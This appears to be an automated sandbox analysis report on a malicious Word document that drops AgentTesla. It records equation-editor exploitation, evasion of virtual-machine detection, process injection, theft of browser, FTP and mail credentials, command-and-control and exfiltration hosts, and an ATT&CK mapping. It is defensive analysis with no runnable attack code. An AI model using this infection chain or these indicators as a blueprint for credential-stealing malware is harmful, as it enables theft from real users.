              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess created: C:\Users\user\AppData\Roaming\RegAskcfcd.exe C:\Users\user\AppData\Roaming\RegAskcfcd.exe
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 4_2_00D448F7 push edi; ret
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_00D448F7 push edi; ret
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mexxxx[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\RegAskcfcd.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWindow / User API: threadDelayed 9621
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2316Thread sleep time: -300000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exe TID: 2936Thread sleep time: -300000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exe TID: 2444Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exe TID: 2444Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_0040417E LdrInitializeThunk,
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeMemory written: C:\Users\user\AppData\Roaming\RegAskcfcd.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\RegAskcfcd.exe C:\Users\user\AppData\Roaming\RegAskcfcd.exe
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeProcess created: C:\Users\user\AppData\Roaming\RegAskcfcd.exe C:\Users\user\AppData\Roaming\RegAskcfcd.exe
              Source: RegAskcfcd.exe, 00000005.00000002.2362706604.0000000000D60000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: RegAskcfcd.exe, 00000005.00000002.2362706604.0000000000D60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: RegAskcfcd.exe, 00000005.00000002.2362706604.0000000000D60000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeQueries volume information: C:\Users\user\AppData\Roaming\RegAskcfcd.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeQueries volume information: C:\Users\user\AppData\Roaming\RegAskcfcd.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000005.00000002.2362272923.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2110262554.00000000036FE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2362877479.000000000222B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAskcfcd.exe PID: 2840, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAskcfcd.exe PID: 2508, type: MEMORY
              Source: Yara matchFile source: 5.2.RegAskcfcd.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: Yara matchFile source: 00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2362877479.000000000222B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAskcfcd.exe PID: 2840, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000005.00000002.2362272923.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2110262554.00000000036FE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2362877479.000000000222B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAskcfcd.exe PID: 2840, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAskcfcd.exe PID: 2508, type: MEMORY
              Source: Yara matchFile source: 5.2.RegAskcfcd.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading1OS Credential Dumping2Security Software Discovery11Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion13LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion13SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSProcess Discovery2Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol113Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery114Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 345146 Sample: documenting.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 Yara detected AgentTesla 2->38 40 5 other signatures 2->40 7 EQNEDT32.EXE 15 2->7         started        12 WINWORD.EXE 291 25 2->12         started        process3 dnsIp4 28 cybersng.duckdns.org 172.111.202.41, 443, 49165 BLACKNIGHT-ASIE United States 7->28 30 cy.kl-re.com 7->30 22 C:\Users\user\AppData\...\RegAskcfcd.exe, PE32 7->22 dropped 24 C:\Users\user\AppData\Local\...\mexxxx[1].exe, PE32 7->24 dropped 48 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->48 14 RegAskcfcd.exe 12 7->14         started        file5 signatures6 process7 dnsIp8 32 193.239.147.103, 49168, 80 DEDIPATH-LLCUS Brunei Darussalam 14->32 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->50 52 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->52 54 Injects a PE file into a foreign processes 14->54 18 RegAskcfcd.exe 2 14->18         started        signatures9 process10 dnsIp11 26 mail.privateemail.com 198.54.122.60, 49169, 49170, 49171 NAMECHEAP-NETUS United States 18->26 42 Tries to steal Mail credentials (via file access) 18->42 44 Tries to harvest and steal ftp login credentials 18->44 46 Tries to harvest and steal browser information (history, passwords, etc) 18->46 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              documenting.doc38%VirustotalBrowse
